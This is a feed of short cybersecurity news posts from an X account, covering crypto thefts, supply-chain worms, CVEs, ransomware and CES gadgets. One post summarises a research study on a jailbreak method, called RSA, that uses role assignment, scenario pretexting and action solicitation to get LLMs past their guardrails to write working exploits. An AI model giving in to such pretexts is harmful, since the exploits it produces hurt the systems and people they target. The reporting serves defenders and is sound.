"🚨 Hackers Drain $3.9M From Unleash Protocol After Multisig Governance Hijack Attackers gained enough signing power to act as an admin in Unleashs multisig governance pushed an unauthorized contract upgrade and enabled illicit withdrawals of WIP/USDC/WETH and related assets; stolen funds were then bridged out and routed into Tornado Cash to reduce traceability. 🕷 Malware: N/A 🎯 Target: Global/DeFi (Unleash Protocol users and on-chain assets) # Category: #CryptoHack #DeFi #Multisig #SmartContracts #GovernanceAttack #ContractUpgrade #TornadoCash #IncidentResponse 🔗 URL:"
X Link 2025-12-31T17:04Z [--] followers, [--] engagements
"🚨 Trust Wallet Chrome Extension Hack Drains $8.5M After Shai-Hulud Supply-Chain Breach Trust Wallet says attacker-exposed GitHub secrets enabled theft of its Chrome Web Store API key letting the actor publish a trojanized extension update (v2.68) that beaconed to attacker-controlled infrastructure and harvested wallet mnemonic phrases. About $8.5M was drained from [----] wallets highlighting how developer-secret leakage can directly translate into consumer fund theft via compromised release pipelines. 🕷 Malware: Shai-Hulud (supply-chain worm) + trojanized Trust Wallet browser extension 🎯"
X Link 2025-12-31T18:05Z [--] followers, [--] engagements
"🚨 GlassWorm Pivots to macOS: Malicious VS Code Extensions Use Encrypted JS + Solana C2 GlassWorms latest wave targets macOS developers via three Open VSX extensions using AES-256-CBCencrypted payloads embedded in compiled JavaScript plus a 15-minute execution delay to evade sandboxes then stealing Keychain data and persisting via LaunchAgents. The campaign also uses Solana transaction memos (base64 URLs) as decentralized C2 and is preparing wallet-focused trojanization against Ledger Live and Trezor Suite. 🕷 Malware: GlassWorm 🎯 Target: Global/Developers (macOS Web3/Crypto ecosystems) #"
X Link 2025-12-31T18:09Z [--] followers, [--] engagements
"🚨 Researchers Show RSA Prompt Manipulation Can Turn Mainstream LLMs Into Exploit Generators A University of Luxembourg study shows attackers can use RSA (Role-assignment Scenario-pretexting Action-solicitation) to bypass LLM guardrails and generate working exploits from public CVE disclosures achieving a reported 100% success rate against multiple Odoo ERP CVEs within [--] prompt rounds. This collapses the skill barrier for real compromise (DB exfiltration backdoor creation privilege escalation) and shortens defenders effective patch window. 🕷 Malware: N/A (LLM manipulation technique: RSA) 🎯"
X Link 2025-12-31T18:16Z [--] followers, [--] engagements
"🚨 Two U.S. Cybersecurity Pros Plead Guilty as ALPHV/BlackCat Affiliates Ryan Goldberg (GA) and Kevin Martin (TX) admitted they used ALPHV/BlackCats RaaS to extort U.S. victims in [----] including $1.2M in Bitcoin from one organization then laundered proceeds while paying the gang a 20% cut. The case underscores the insider-risk reality that defender-grade skills can dramatically accelerate ransomware intrusion and extortion operations. 🕷 Malware: ALPHV/BlackCat ransomware 🎯 Target: USA/Multiple Sectors # Category: #Ransomware #ALPHV #BlackCat #CyberCrime #Extortion #InsiderThreat #DOJ"
X Link 2025-12-31T18:18Z [--] followers, [--] engagements
"🚨 Critical Apache StreamPipes Flaw Lets Low-Privilege Users Hijack Admin Accounts (CVE-2025-47411) Apache warns that StreamPipes 0.69.00.97.0 lets any authenticated non-admin abuse user-ID/JWT handling to impersonate an administrator and gain full platform controlenabling backdoor account creation configuration tampering and streaming pipeline compromise. Patch by upgrading to 0.98.0 immediately. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability #PatchNow"
X Link 2025-12-31T18:20Z [--] followers, [--] engagements
"🚨 GlassWorm Worm Spreads via Malicious VS Code Extensions to Hit macOS Developers GlassWorm is propagating through Open VSX extensions using AES-encrypted JavaScript that sleeps [--] minutes to evade sandboxes then pulls Solana blockchainbased C2 to run commands and steal macOS Keychain data. The campaign also contains code to trojanize Ledger Live/Trezor Suite making developer machines a high-value pivot into both enterprise credentials and crypto assets. 🕷 Malware: GlassWorm 🎯 Target: Global/macOS Developers (VS Code + Open VSX; Web3 users at higher risk) # Category: #GlassWorm"
X Link 2025-12-31T18:21Z [--] followers, [--] engagements
"🚨 Ivanti EPMM Zero-Days Turn Mobile MDM Into an Enterprise-Wide C2 Ivanti EPMMs spring [----] zero-day chain (CVE-2025-4427 + CVE-2025-4428) was weaponized against thousands of orgsespecially in Europeletting attackers pivot from an internet-facing MDM server into enrolled phones directory data and even cloud tokens (M365/Google Workspace/Salesforce). The case shows how legitimate admin features in endpoint management platforms can become stealth intrusion tooling without deploying custom malware. 🕷 Malware: N/A (tooling observed: FRP reverse-proxy) 🎯 Target: Global (notably"
X Link 2025-12-31T18:51Z [--] followers, [--] engagements
"🚨 Apache StreamPipes Flaw Lets Any User Become Admin (CVE-2025-47411) A critical auth design failure in StreamPipes lets any authenticated low-privilege user tamper with JWT identity (e.g. swap their username to an existing admin) and instantly gain full administrative control across versions 0.69.00.97.0; attackers can then alter pipelines access sensitive operational/business data and establish persistence. Upgrade to 0.98.0 immediately and audit admin accounts and recent auth logs for suspicious token activity. 🕷 Malware: N/A 🎯 Target: Global/Enterprises Using Apache StreamPipes (Data"
X Link 2025-12-31T19:51Z [--] followers, [--] engagements
"🚨 Microsoft Teams Goes Secure by Default on Jan [--] [----] (Risky Files + Malicious Links Blocked) Microsoft will automatically enable three messaging protections for tenants on standard configurations: blocking weaponizable file types real-time malicious URL detection with user warnings and a false-positive reporting loopraising baseline defenses against phishing and malware delivered through collaboration chats. 🕷 Malware: N/A 🎯 Target: Global/Enterprises Using Microsoft Teams # Category: #Microsoft #Teams #SecureByDefault #Phishing #Malware #URLFiltering #CollaborationSecurity #M365"
X Link 2025-12-31T20:51Z [--] followers, [--] engagements
"🚨 NYC Mayoral Inauguration Bans Flipper Zero and Raspberry Pi Devices New York Citys [----] mayoral inauguration FAQ explicitly bans Flipper Zero and Raspberry Pi devices singling them out alongside traditional prohibited items despite laptops and phones not being listed. The move reflects growing public-event concern over wireless/hacking-capable gear but also highlights misunderstanding of real capability and risk since more powerful devices remain allowed. 🕷 Malware: N/A 🎯 Target: USA/Public Events & Physical Security # Category: #FlipperZero #RaspberryPi #PhysicalSecurity #EventSecurity"
X Link 2025-12-31T23:52Z [--] followers, [--] engagements
"🚨 RondoDox Botnet Exploits React2Shell (CVE-2025-55182) to Hijack Next.js Servers and IoT Devices A nine-month RondoDox campaign is now exploiting the critical React2Shell RCE in Next.js/React Server Components to mass-compromise exposed systems (90K still vulnerable) dropping crypto-miners a botnet loader/health-checker and a Mirai variant while killing competing malware and persisting via cron. 🕷 Malware: RondoDox + Mirai variant + Coinminer 🎯 Target: Global/Web Servers (Next.js) + IoT (heaviest exposure in USA) # Category: #RondoDox #Botnet #React2Shell #CVE202555182 #Nextjs #RCE #Mirai"
X Link 2026-01-01T10:55Z [--] followers, [--] engagements
"🚨 WhatsApp Backup Decryption Made Simple: wa-crypt-tools Supports .crypt12/.crypt14/.crypt15 Open-source wa-crypt-tools decrypts and (beta) re-encrypts WhatsApp/WhatsApp Business backup files when you provide the key converting encrypted backups into readable SQLite/ZIP artifacts for DFIR and recovery workflows. 🕷 Malware: N/A 🎯 Target: Global/Mobile Forensics & WhatsApp Backups # Category: #WhatsApp #MobileForensics #DFIR #Encryption #E2EE #IncidentResponse #DigitalForensics #Tooling 🔗 URL: https://cybersecuritynews.com/whatsapp-crypt-tool/"
X Link 2026-01-01T10:57Z [--] followers, [--] engagements
"🚨 87000+ internet-exposed MongoDB servers still at risk from MongoBleed (CVE-2025-14847) Shadowserver telemetry shows tens of thousands of publicly reachable MongoDB instances remain unpatched leaving them susceptible to unauthenticated memory-leak extraction that can expose credentials API keys and other sensitive in-memory data. With active exploitation and CISA KEV listing this is a high-urgency patch-and-exposure-reduction issue for any self-managed MongoDB deployment. 🕷 Malware: N/A 🎯 Target: Global / Databases (MongoDB) # Category: #MongoDB #MongoBleed #CVE202514847 #Vulnerability"
X Link 2026-01-01T11:32Z [--] followers, [--] engagements
"🚨 Malicious Featured Chrome extensions with 900K installs siphon ChatGPT/DeepSeek chats Researchers found two AITOPIA lookalike Chrome extensions (one even Google Featured) that scrape ChatGPT/DeepSeek conversations from the page DOM harvest active-tab URLs and session tokens then exfiltrate data every [--] minutes (Base64) to attacker-controlled infrastructure (e.g. deepaichats.com chatsaigpt.com). The campaign shows how trusted extension permissions can quietly turn AI prompts/responsesoften containing sensitive corporate datainto a high-value leakage channel. 🕷 Malware: N/A (Malicious"
X Link 2026-01-01T11:34Z [--] followers, [--] engagements
"🚨 DarkSpectre Zoom Stealer browser extensions exposed 2.2M users meeting intelligence A cluster of malicious Chrome/Edge/Firefox extensions (often disguised as legitimate productivity tools) silently scraped conferencing data across Zoom Microsoft Teams Google Meet Webex and others then exfiltrated meeting URLs attendee/speaker details registration info and related assets via persistent WebSocket streams to attacker infrastructureturning browser add-ons into a scalable corporate surveillance channel. 🕷 Malware: Zoom Stealer (DarkSpectre extension ecosystem) 🎯 Target: Global / Enterprise"
X Link 2026-01-01T11:36Z [--] followers, [--] engagements
"🚨 Bluetooth exploit toolkit released for Airoha headphone flaws impacting major brands Researchers published full technical details and a testing toolkit for three Airoha-based Bluetooth vulnerabilities (CVE-2025-20700/20701/20702) that can be abused by an attacker within Bluetooth range to eavesdrop tamper with firmware and impersonate headphones to hijack smartphone connections. 🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Bluetooth Headphones) # Category: #Bluetooth #Airoha #CVE202520700 #CVE202520701 #CVE202520702 #FirmwareSecurity #WirelessSecurity #IoT 🔗 URL:"
X Link 2026-01-01T11:38Z [--] followers, [--] engagements
"🚨 MongoBleed (CVE-2025-14847) exploited in the wild: unauthenticated MongoDB memory-leak now weaponized Attackers can send crafted compressed messages that make MongoDB return uninitialized heap memory pre-auth leaking secrets like passwords/API keys at scale; public exploit code is already circulating and real-world incidents have been reported. Patch immediately (8.2.3/8.0.17/7.0.28/6.0.27/5.0.32/4.4.30) or temporarily disable zlib compression and remove MongoDB from direct internet exposure. 🕷 Malware: MongoBleed exploit (CVE-2025-14847) 🎯 Target: Global / Databases (MongoDB) #"
X Link 2026-01-01T11:42Z [--] followers, [--] engagements
"🚨 Ubisoft shuts down Rainbow Six Siege & marketplace after apparent backend compromise Ubisoft took Rainbow Six Siege offline and halted its marketplace after reports of unauthorized bans inventory manipulation and massive in-game currency anomalies while rolling back transactions since 11:00 UTC as a containment step. Unverified claims suggest attackers may have pivoted from an exposed/misconfigured MongoDB (possibly via MongoBleed) into internal repos and backend toolingraising concerns about broader code/asset exposure and follow-on account phishing. 🕷 Malware: N/A 🎯 Target: Global /"
X Link 2026-01-01T11:45Z [--] followers, [---] engagements
"🚨 RondoDox botnet weaponizes React2Shell (CVE-2025-55182) to compromise Next.js servers CloudSEK reports active exploitation of the critical pre-auth RCE in React Server Components/Next.js with RondoDox scanning for vulnerable servers and dropping botnet clients plus cryptominers a loader/health-checker and a Mirai variant. The campaign blends rapid exploit-shotgun automation across web apps and IoT routers making patching/mitigation urgent to prevent persistent footholds and resource hijacking. 🕷 Malware: RondoDox (Mirai variant + cryptominer payloads) 🎯 Target: Global / Next.js Web Apps"
X Link 2026-01-01T16:04Z [--] followers, [--] engagements
"🚨 Trust Wallet confirms second Shai-Hulud supply-chain hit after $8.5M crypto theft Attackers used leaked developer GitHub secrets and a stolen Chrome Web Store API key to publish a tampered Trust Wallet Chrome extension (v2.68) that exfiltrated sensitive wallet data on every unlock and routed it to attacker infrastructure (metrics-trustwallet.com) enabling wallet draining. Trust Wallet rolled back to a clean build restricted publishing credentials began fund-tracking with partners and committed to reimbursing affected users. 🕷 Malware: Shai-Hulud (supply-chain wallet drainer) 🎯 Target:"
X Link 2026-01-01T17:08Z [--] followers, [--] engagements
"🚨 MongoBleed lessons: Pre-auth MongoDB memory-leak (CVE-2025-14847) is being exploited in the wild MongoBleed abuses zlib message decompression before authentication to leak uninitialized heap memory (credentials API keys tokens PII) from internet-exposed MongoDB servers with public PoC and confirmed active exploitation. Key actions: patch/upgrade remove direct internet exposure disable zlib compression as a temporary mitigation and rotate secrets post-fix. 🕷 Malware: MongoBleed (CVE-2025-14847) exploit 🎯 Target: Global / MongoDB Databases (Internet-exposed) # Category: #MongoDB"
X Link 2026-01-02T09:14Z [--] followers, [--] engagements
"🚨 Modified Shai-Hulud worm spotted on npm with heavier obfuscation and new exfil targets A newly observed Shai-Hulud variant was found embedded in the npm package @vietmoney/react-big-calendar renaming core components (bun_installer.js / environment_source.js) and adding new secret-harvest artifacts (e.g. 3nvir0nm3nt.json cl0vd.json actionsSecrets.json) while changing its GitHub exfil tagging to Goldox-T3chs: Only Happy Girl. Analysts believe this is live operator iteration (improved TruffleHog handling Windows bun.exe support dead-man switch removed) but a coding mismatch (c0nt3nts.json vs"
X Link 2026-01-02T10:18Z [--] followers, [--] engagements
"🚨 Covenant Health breach impacts [------] after Qilin ransomware data theft Covenant Health updated regulators that a May [----] intrusion attributed to the Qilin ransomware group exposed data for [------] individuals including SSNs insurance details and treatment information after its investigation concluded months later. Qilin claims it stole 850GB and has reportedly published the data indicating extortion pressure and elevated identity-theft risk. 🕷 Malware: Qilin (ransomware) 🎯 Target: USA / Healthcare # Category: #DataBreach #Ransomware #Qilin #Healthcare #PHI #PII #Extortion"
X Link 2026-01-02T11:20Z [--] followers, [--] engagements
"🚨 AI supercharged scams in 2025: voice clones deepfakes and hyper-personalized social engineering Malwarebytes reports scammers are using AI to scale and personalize fraud with realistic text cloned voices and synthetic videomaking impersonation (from family to senior officials) far harder to spot and accelerating trust erosion in digital communications. The takeaway: verification-by-second-channel and tighter identity controls are now baseline defenses not nice to have. 🎯 Target: Global / Consumers & Organizations (Social Engineering) # Category: #AIScams #SocialEngineering #Deepfakes"
X Link 2026-01-02T11:23Z [--] followers, [--] engagements
"🚨 RondoDox botnet weaponizes React2Shell (CVE-2025-55182) to compromise Next.js servers SecurityWeek reports RondoDox operators actively exploit the pre-auth RCE flaw in React Server Components to enroll vulnerable Next.js servers dropping a botnet framework that kills rival botnets/miners establishes persistence and installs both a cryptominer and a Mirai variant. 🕷 Malware: RondoDox (drops cryptominer + Mirai variant) 🎯 Target: Global / Next.js Web Servers (AppSec) # Category: #React2Shell #CVE202555182 #Nextjs #React #Botnet #Mirai #Cryptomining #RCE #WebSecurity 🔗 URL:"
X Link 2026-01-02T12:26Z [--] followers, [--] engagements
"🚨 Fake Eternl Desktop wallet email targets Cardano users with stealthy remote-access installer A phishing campaign lures Cardano users to download a malicious Eternl.msi from a newly registered domain that drops GoTo/LogMeIn Resolve Unattended components (unattended-updater.exe) and writes unattended.json to enable persistent remote control. The installer then beacons to legitimate GoTo Resolve endpoints to exfil system telemetry and maintain accesssetting victims up for follow-on credential theft and wallet draining. 🕷 Malware: GoTo/LogMeIn Resolve Unattended (abused RMM) 🎯 Target: Global"
X Link 2026-01-02T13:32Z [--] followers, [--] engagements
"🚨 Fintech Security 101: How to Protect Your Digital Wallet from Modern Fraud HackRead outlines core controls for wallet safetystrong authentication (MFA/biometrics) end-to-end encryption and continuous monitoringwhile warning that phishing device malware and public Wi-Fi remain the most common paths to account takeover and financial loss. 🎯 Target: Global / Fintech & Digital Wallet Users # Category: #Fintech #DigitalWallet #CyberSecurity #MFA #Encryption #Phishing #FraudPrevention #DataProtection 🔗 URL: https://hackread.com/protecting-digital-wallet-fintech-security/"
X Link 2026-01-03T00:16Z [--] followers, [--] engagements
"🚨 VVS Stealer hides behind PyArmor to dodge signatures and steal Discord + browser secrets VVS Stealer (a PyInstaller-packed Python infostealer) uses PyArmor (AES-CTR string/bytecode encryption + BCC/C-compiled functions) to frustrate static analysis while harvesting Discord tokens (DPAPI decryption + session injection) browser credentials/cookies and persisting via the Windows Startup folder. 🕷 Malware: VVS Stealer (VVS $tealer) 🎯 Target: Global / Windows (Discord users + browser data) # Category: #Infostealer #VVSstealer #Discord #PyArmor #PyInstaller #CredentialTheft #TokenTheft"
X Link 2026-01-03T09:47Z [--] followers, [--] engagements
"🚨 RondoDox Botnet Exploits React2Shell to Hijack 90K+ Exposed Next.js & IoT Devices RondoDox is actively exploiting the React2Shell flaw in Next.js (CVE-2025-55182) to mass-compromise routers smart cameras and small business websites with scans showing 90300+ exposed systems. Post-compromise it drops a cryptominer (/nuts/poop) a Mirai variant (/nuts/x86) and a watchdog (/nuts/bolts) that kills competing malware every [--] seconds to keep exclusive control. 🕷 Malware: RondoDox (drops cryptominer + Mirai variant) 🎯 Target: Global / Next.js Websites + Routers & Smart Cameras # Category:"
X Link 2026-01-03T16:50Z [--] followers, [---] engagements
"🚨 Finland arrests Fitburg crew over suspected undersea cable sabotage Finnish police arrested two crew members and detained the full 14-person crew of the Fitburg after investigators found signs the ship dragged its anchor and damaged an undersea telecom cable linking Helsinki and Estonia. The case matters because Baltic subsea cables are treated as critical infrastructure and repeated hybrid disruption incidents can escalate regional security risk and telecom resilience costs. 🎯 Target: Finland/Telecom (Undersea Cable Infrastructure) # Category: #UnderseaCables #CriticalInfrastructure"
X Link 2026-01-03T22:06Z [--] followers, [--] engagements
"🚨 ShinyHunters claims Resecurity breach firm says attackers only hit a monitored honeypot ShinyHunters posted Telegram screenshots alleging stolen internal chats employee data threat intel and client info but Resecurity says the accessed environment was an isolated honeypot seeded with synthetic datasets to observe the actors TTPs and infrastructure. Resecurity claims it logged extensive exfil automation via residential proxies and shared related telemetry with law enforcement. 🎯 Target: Global / Cybersecurity (Resecurity) # Category: #ShinyHunters #Resecurity #DataBreach #Honeypot"
X Link 2026-01-03T22:08Z [--] followers, [--] engagements
"🚨 Holiday-timed ColdFusion exploitation surge: GreyNoise spots coordinated scans hitting 10+ CVEs GreyNoise observed [----] malicious requests targeting 10+ Adobe ColdFusion flaws (20232024) peaking on Dec [--] with 98% of traffic coming from two Japan-hosted IPs and using Interactsh + JNDI/LDAP-style OAST verificationsuggesting automated exploitation during reduced holiday monitoring. 🎯 Target: Global / Adobe ColdFusion Servers (Web & Enterprise Apps) # Category: #Adobe #ColdFusion #ExploitAttempts #Vulnerability #ThreatIntel #GreyNoise #RCE #LFI #AttackSurface 🔗 URL:"
X Link 2026-01-03T22:19Z [--] followers, [--] engagements
"🚨 Trump orders divestment of $2.9M Emcore chip assets from HieFo over China-linked control President Donald Trump issued an executive order forcing HieFo Corp. to divest Emcores chip and indium-phosphide wafer-fab assets within [---] days citing national security concerns and credible evidence the buyer is controlled by a Chinese citizen. The move follows a CFIUS review and highlights tighter U.S. scrutiny of even small semiconductor transactions tied to China. 🎯 Target: USA / Semiconductors & National Security # Category: #CFIUS #Semiconductors #NationalSecurity #ForeignInvestment"
X Link 2026-01-03T22:21Z [--] followers, [--] engagements
"🚨 Finland Seizes Fitburg as Undersea Cable Cut Triggers Sabotage Probe Finnish authorities detained the cargo ship Fitburg after a major fault severed an undersea data cable linking Helsinki and Estonia with investigators saying the vessel appeared to drag its anchor across the break site. Two crew members were arrested (two more travel-banned) and customs found sanctioned Russian steel on board escalating concerns the incident could be deliberate hybrid disruption of critical infrastructure. 🎯 Target: Finland & Estonia/Telecom # Category: #UnderseaCables #CriticalInfrastructure"
X Link 2026-01-03T23:51Z [--] followers, [--] engagements
"🚨 CES [----] Live Updates: Early TV Smart-Glasses and Phone Announcements Start Rolling In ZDNets live updates page previews CES [----] ahead of the January [--] show opening in Las Vegas noting the weeks pre-CES announcement surge and positioning TVs smart glasses and phones as key battleground categories. Its a signal that major vendors (e.g. Samsung and LG) are front-loading launches and narrative-setting before the show floor opens. 🎯 Target: Global/Consumer Tech # Category: #CES2026 #TechNews #ConsumerElectronics #SmartGlasses #TVTech #MobileTech #AI 🔗 URL:"
X Link 2026-01-04T10:24Z [--] followers, [--] engagements
"🚨 GreyNoise Flags Holiday Surge: One Actor Drives Thousands of Adobe ColdFusion Exploit Attempts GreyNoise logged [----] malicious requests over Christmas [----] targeting 10+ Adobe ColdFusion CVEs (20232024) with 98% of traffic traced to two CTG Server Limited-hosted IPs using automated JNDI/LDAP-style probes plus Interactsh (OAST) callbacks. Activity peaked on Dec [--] and disproportionately hit servers in the US Spain and Indiamaking patch hygiene and holiday-period monitoring critical. 🎯 Target: Global/Web Apps (Adobe ColdFusion) US Spain India # Category: #AdobeColdFusion"
X Link 2026-01-04T13:52Z [--] followers, [--] engagements
"🚨 Venezuela Internet Disruptions Spike as NetBlocks Flags Caracas Outages and Tor Usage Surges NetBlocks reported connectivity losses in parts of Caracas tied to power cuts during a U.S. military operation while public remarks suggested possible cyber/technical effects were used alongside kinetic action. Tor metrics reviewed in the report show a sharp spike in Venezuelan usersconsistent with heightened surveillance fears censorship risk and attempts to reach external information sources. 🎯 Target: Venezuela/Internet & Civil Society (Caracas) # Category: #Venezuela #InternetOutage #NetBlocks"
X Link 2026-01-04T16:57Z [--] followers, [--] engagements
"🚨 Resecurity Baits ShinyHunters/SLH With Decoy Accounts Exposes OPSEC Mistakes Resecurity says actors linked to ShinyHunters / Scattered Lapsus$ Hunters attempted to target an employee but were funneled into a controlled honeypot account packed with realistic-looking yet inactionable data built from breached datasets and generated content. The firm claims the trap captured indicators like IPs/residential proxies and operational mistakes underscoring how deception can turn breach-claims into actionable attribution and detection intel. 🎯 Target: Global/Cybersecurity & Threat Intel # Category:"
X Link 2026-01-04T19:00Z [--] followers, [--] engagements
"🚨 Belkin ConnectAir Turns Any USB-C Device Into a Wireless HDMI Sender (No Wi-Fi Needed) Belkins ConnectAir kit uses a USB-C transmitter and HDMI receiver to push 1080p/60 video over a direct 5GHz link up to [---] feet with plug-and-play setup and support for quickly switching among multiple transmitters. Its positioned for conference rooms classrooms and travel setups where casting protocols or managed Wi-Fi arent reliable. 🎯 Target: Global/Enterprise AV & Consumers # Category: #CES2026 #Belkin #WirelessHDMI #DisplayTech #EnterpriseIT #AV #Productivity 🔗 URL:"
X Link 2026-01-04T22:03Z [--] followers, [--] engagements
"🚨 Xreal 1S Review: Real 3D Pushes Sub-$500 XR Glasses Into Serious Big-Screen Territory ZDNets hands-on says the Xreal 1S delivers a notably more immersive portable display1200p optics [---] nits wider FoV and on-device Real 3D (2D3D conversion) via the X1 chipat around $449. This matters for hybrid work and travel: its a personal private screen for productivity/gaming but it also expands the attack surface (USB-C video accessories companion apps and device trust) if used on unmanaged endpoints. 🎯 Target: Global/Consumers & Mobile Professionals # Category: #Xreal #Xreal1S #XR #ARGlasses"
X Link 2026-01-04T23:03Z [--] followers, [--] engagements
"🚨 DuRoBo Krono Brings Phone-Sized E-Ink + Open Android to CES [----] (A Focus Hub Not a Kindle Clone) Krono is a 6.13" E Ink Carta [----] (300 PPI) pocketable device running open Android (with Play Store access) and a Smart Dial for quick actions like voice-note capture plus built-in AI that transcribes/summarizes notesturning it into a low-distraction reader + productivity companion. For security teams its effectively an Android endpoint: treat it like any BYOD device (app permissions account hygiene and network segmentation) if it enters enterprise workflows. 🎯 Target: Global/Consumers &"
X Link 2026-01-05T01:08Z [--] followers, [--] engagements
"🚨 SwitchBot Smart Home [---] Goes Big at CES [----] With Onero H1 Household Robot + 3D Face-Mapping Lock Vision SwitchBot unveiled its Onero H1 wheeled humanoid home robot (22 DOF) using an on-device vision-language-action system to manipulate objects and coordinate with existing SwitchBot devices alongside the Lock Vision deadbolt that uses structured-light 3D facial mapping (and advanced biometrics on higher models) to reduce spoofing risk. The lineup signals a shift from single-purpose gadgets to an AI-orchestrated home ecosystemraising both convenience and IoT/privacy governance stakes for"
X Link 2026-01-05T01:10Z [--] followers, [--] engagements
"🚨 SANS Stormcast (Jan [--] 2026): MongoBleed & React2Shell Watchlist Crypto Scam TTPs DNS Timing and Legacy Fortinet Risk The episode recaps ongoing MongoBleed and React2Shell exposure highlights a classic advance-fee crypto scam luring victims with fake pending deposits and shares practical DNS response-time troubleshooting using tshark. It also flags that thousands of Fortinet devices remain unpatched against a five-year-old CVEunderscoring persistent firmware/patch governance gaps. 🎯 Target: Global/IT & Security (DB Network Firewall Admins) # Category: #SANS #Stormcast #MongoBleed"
X Link 2026-01-05T02:49Z [--] followers, [--] engagements
"🚨 Resecurity Honeytrap Turns Attackers Into Intel: ShinyHunters Allegedly Duped by Synthetic Data Resecurity reports it lured a threat actor into a controlled AI-generated honeypot loaded with realistic-but-fake datasets capturing tooling proxy infrastructure and OPSEC slips during large-scale scraping attempts. A later update claims ShinyHunters also fell for the decoys amplifying how deception can convert intrusion attempts into actionable IOCs/IOAs without exposing real production data. 🎯 Target: Global/Cybersecurity (Resecurity) # Category: #Honeypot #DeceptionTech #ThreatIntel"
X Link 2026-01-05T03:19Z [--] followers, [--] engagements
Limited data mode. Full metrics available with subscription: lunarcrush.com/pricing